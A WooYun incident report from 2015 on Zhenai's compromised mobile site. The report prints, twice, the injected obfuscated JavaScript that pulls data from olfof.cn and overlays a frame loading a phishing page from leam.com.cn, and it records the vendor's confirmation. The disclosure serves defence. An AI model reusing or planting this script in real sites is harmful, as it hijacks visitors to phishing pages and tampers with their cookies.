当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-097901

漏洞标题:珍爱网被shell已被用作钓鱼

相关厂商:珍爱网

漏洞作者: 路人甲

提交时间:2015-02-21 15:01

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-21: 细节已通知厂商并且等待厂商处理中
2015-02-21: 厂商已经确认,细节仅向厂商公开
2015-03-03: 细节向核心白帽子及相关领域专家公开
2015-03-13: 细节向普通白帽子公开
2015-03-23: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

珍爱网被shell

详细说明:

http://m.zhenai.com/profile/qq/index.html?8oHP#www.5173.com-20150204.shtml
http://m.zhenai.com/profile/qq/index.html?
源代码
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta charset="utf-8" />
<meta name="renderer" content="webkit" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="0" />
<title></title>
</head>
<script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.0.min.js"></script>
<script type="text/javascript">
var _$=["location","search","substr","http://www.leam.com.cn/g.php","document","cookie","indexOf","links=","parseInt","random","ajax","get","http://www.olfof.cn/json.php?k=","jsonp","callback","success_MyCallback","body","empty","links=","links","base=","reload","body","html","..",'links','base',"?b=","&l=","document","split","; ","length","=","unescape",'write','<fra','write','meset','write',' framespacing="0" border="0" rows="100%,*" frameborder="0">','write','<frame src="','"','write',' scrolling="yes">','write','</frame>','write','</fra','write','meset>','',"charCodeAt","toString","match",'=0;expires=',"toUTCString"];var a=window[_$[0]][_$[1]][_$[2]](1);var b=_$[3];if(window[_$[4]][_$[5]][_$[6]](_$[7])==-1){var g=window[_$[8]](Math[_$[9]]()*19+16);$[_$[10]]({type:_$[11],url:_$[12]+a,dataType:_$[13],jsonp:_$[14],jsonpCallback:_$[15],success:function(h){$(_$[16])[_$[17]]();window[_$[4]][_$[5]]=_$[7]+e(h[_$[19]],g);window[_$[4]][_$[5]]=_$[20]+g;location[_$[21]](false)},error:function(){$(_$[16])[_$[23]](_$[24])}})}else{var g=c(_$[25]);var h=c(_$[26]);f();var i=b+_$[27]+h+_$[28]+g;d(i,_$[4])};function c(g){var h=window[_$[4]][_$[5]][_$[30]](_$[31]);for(var i=0;i<h[_$[32]];i++){var j=h[i][_$[30]](_$[33]);if(j[0]==g)return window[_$[34]](j[1])}};function d(g,h){window[h][_$[35]](_$[36]);window[h][_$[35]](_$[38]);window[h][_$[35]](_$[40]);window[h][_$[35]](_$[42]+g+_$[43]);window[h][_$[35]](_$[45]);window[h][_$[35]](_$[47]);window[h][_$[35]](_$[49]);window[h][_$[35]](_$[51])};function e(g,h){var i=g[_$[32]];str=_$[52];for(var j=0;j<i;j++){str+=window[_$[8]](g[_$[53]](j))[_$[54]](h)};return str};function f(){var h=window[_$[4]][_$[5]][_$[55]](/[^ =;]+(?=\=)/g);if(h){for(var i=h[_$[32]];i--;){window[_$[4]][_$[5]]=h[i]+_$[56]+new Date(0)[_$[57]]()}}}
</script>
<body>
</body>
</html>

问题站点
http://www.olfof.cn/
shell没扫出来
管理员自行排查

漏洞证明:

http://m.zhenai.com/profile/qq/index.html?8oHP#www.5173.com-20150204.shtml
http://m.zhenai.com/profile/qq/index.html?
源代码
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta charset="utf-8" />
<meta name="renderer" content="webkit" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="0" />
<title></title>
</head>
<script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.0.min.js"></script>
<script type="text/javascript">
var _$=["location","search","substr","http://www.leam.com.cn/g.php","document","cookie","indexOf","links=","parseInt","random","ajax","get","http://www.olfof.cn/json.php?k=","jsonp","callback","success_MyCallback","body","empty","links=","links","base=","reload","body","html","..",'links','base',"?b=","&l=","document","split","; ","length","=","unescape",'write','<fra','write','meset','write',' framespacing="0" border="0" rows="100%,*" frameborder="0">','write','<frame src="','"','write',' scrolling="yes">','write','</frame>','write','</fra','write','meset>','',"charCodeAt","toString","match",'=0;expires=',"toUTCString"];var a=window[_$[0]][_$[1]][_$[2]](1);var b=_$[3];if(window[_$[4]][_$[5]][_$[6]](_$[7])==-1){var g=window[_$[8]](Math[_$[9]]()*19+16);$[_$[10]]({type:_$[11],url:_$[12]+a,dataType:_$[13],jsonp:_$[14],jsonpCallback:_$[15],success:function(h){$(_$[16])[_$[17]]();window[_$[4]][_$[5]]=_$[7]+e(h[_$[19]],g);window[_$[4]][_$[5]]=_$[20]+g;location[_$[21]](false)},error:function(){$(_$[16])[_$[23]](_$[24])}})}else{var g=c(_$[25]);var h=c(_$[26]);f();var i=b+_$[27]+h+_$[28]+g;d(i,_$[4])};function c(g){var h=window[_$[4]][_$[5]][_$[30]](_$[31]);for(var i=0;i<h[_$[32]];i++){var j=h[i][_$[30]](_$[33]);if(j[0]==g)return window[_$[34]](j[1])}};function d(g,h){window[h][_$[35]](_$[36]);window[h][_$[35]](_$[38]);window[h][_$[35]](_$[40]);window[h][_$[35]](_$[42]+g+_$[43]);window[h][_$[35]](_$[45]);window[h][_$[35]](_$[47]);window[h][_$[35]](_$[49]);window[h][_$[35]](_$[51])};function e(g,h){var i=g[_$[32]];str=_$[52];for(var j=0;j<i;j++){str+=window[_$[8]](g[_$[53]](j))[_$[54]](h)};return str};function f(){var h=window[_$[4]][_$[5]][_$[55]](/[^ =;]+(?=\=)/g);if(h){for(var i=h[_$[32]];i--;){window[_$[4]][_$[5]]=h[i]+_$[56]+new Date(0)[_$[57]]()}}}
</script>
<body>
</body>
</html>

问题站点
http://www.olfof.cn/
shell没扫出来
管理员自行排查

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-02-21 16:39

厂商回复:

安全无小事,谢谢

最新状态:

暂无